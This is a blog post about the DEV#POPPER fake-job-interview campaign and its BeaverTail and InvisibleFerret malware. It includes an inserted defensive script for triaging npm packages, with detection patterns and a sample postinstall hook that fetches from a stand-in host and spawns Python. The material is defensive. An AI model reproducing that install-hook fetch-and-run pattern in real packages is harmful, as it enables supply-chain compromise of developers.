A recent social engineering campaign is targeting software developers with fake job interviews that deliver bogus npm packages, aiming to trick them into downloading a Python backdoor.

Security researchers from Securonix have identified the campaign as “DEV#POPPER” and have linked it to North Korean threat actors. During these fake job interviews, the developers are lured into downloading and running software from seemingly legitimate sources, such as GitHub. However, the software contains a malicious Node.js payload that compromises the developer’s system once executed.

This activity first came to light in late November 2023 when Palo Alto Networks Unit 42 revealed a cluster of malicious activities known as Contagious Interview, where threat actors posed as employers to distribute malware to software developers. Subsequently, in February, Phylum uncovered malicious packages on the npm registry delivering similar malware families to steal sensitive information from compromised systems.

The attack chain typically starts with a ZIP archive hosted on GitHub, sent to the target as part of the interview process. Within the archive is an innocent-looking npm module housing a malicious JavaScript file (BeaverTail) that serves as an information stealer and as a loader for a Python backdoor called InvisibleFerret, which it retrieves from a remote server.
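A practical defensive check for this kind of lure is to triage an unknown npm project before `npm install` ever runs it. The script below is an added example, not code from the article or from Securonix: it flags install-time lifecycle hooks in `package.json` and JavaScript that combines remote fetching with process spawning or runtime code evaluation, the loader shape described above. The package contents and the `example.invalid` URL are constructed sample input.

```javascript
// Hooks that npm runs automatically during installation.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators that warrant a human look; a hit is a signal, not proof of malice.
const SOURCE_INDICATORS = [
  { name: 'child_process', re: /require\(\s*['"]child_process['"]\s*\)/,
    why: 'spawns external programs (e.g. a Python interpreter)' },
  { name: 'dynamic-eval', re: /\b(eval|new Function)\s*\(/,
    why: 'executes code assembled at runtime' },
  { name: 'remote-fetch', re: /require\(\s*['"](https?|axios|node-fetch)['"]\s*\)|https?:\/\//,
    why: 'reaches out to a remote server' },
  { name: 'hex-string-blob', re: /\\x[0-9a-f]{2}(\\x[0-9a-f]{2}){7,}/i,
    why: 'long hex-escaped string, a common obfuscation pattern' },
];

// packageJsonText: contents of package.json; sources: { "file.js": "source text" }.
// Returns one finding per hook and per indicator that matches in each file.
function triagePackage(packageJsonText, sources) {
  const findings = [];
  const pkg = JSON.parse(packageJsonText);
  for (const hook of LIFECYCLE_HOOKS) {
    if (pkg.scripts && pkg.scripts[hook]) {
      findings.push({ file: 'package.json', indicator: `lifecycle:${hook}`, detail: pkg.scripts[hook] });
    }
  }
  for (const [file, code] of Object.entries(sources)) {
    for (const ind of SOURCE_INDICATORS) {
      if (ind.re.test(code)) findings.push({ file, indicator: ind.name, detail: ind.why });
    }
  }
  return findings;
}

// Constructed sample: a small "interview task" whose postinstall hook runs a
// file that fetches something remote and hands control to a spawned interpreter.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: 'interview-task', version: '1.0.0',
  scripts: { test: 'node test.js', postinstall: 'node setup.js' },
});
const SAMPLE_SOURCES = {
  'setup.js': [
    "const https = require('https');",
    "const { spawn } = require('child_process');",
    "https.get('https://example.invalid/payload', () => { spawn('python', ['-c', 'pass']); });",
  ].join('\n'),
  'test.js': "console.log('ok');",
};

for (const f of triagePackage(SAMPLE_PACKAGE_JSON, SAMPLE_SOURCES)) console.log(f);
```

Run it against the extracted archive's `package.json` and `.js` files before installing anything; any `lifecycle:*` finding means code executes on `npm install` regardless of whether you ever start the project.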

The Python backdoor is capable of carrying out various malicious activities, including command execution, file enumeration, data exfiltration, and clipboard and keystroke logging. This development highlights the evolving techniques North Korean threat actors use to conceal their actions, blend into networks, and extract data for financial gain.

Researchers at Securonix emphasize the importance of maintaining a security-focused mindset during situations like job interviews, especially when being targeted through social engineering attacks. They warn that the attackers behind the DEV#POPPER campaign exploit the distraction and stress of candidates during such high-pressure situations.

The continuous evolution of cyber attack strategies by North Korean threat actors underscores the need for vigilance and caution among software developers and individuals targeted by such social engineering campaigns.

Fabio

Full Stack Developer

About the Author

I’m passionate about web development and design in all its forms, helping small businesses build and improve their online presence. I spend a lot of time learning new techniques and actively helping other people learn web development through a variety of help groups and writing tutorials for my blog about advancements in web design and development.
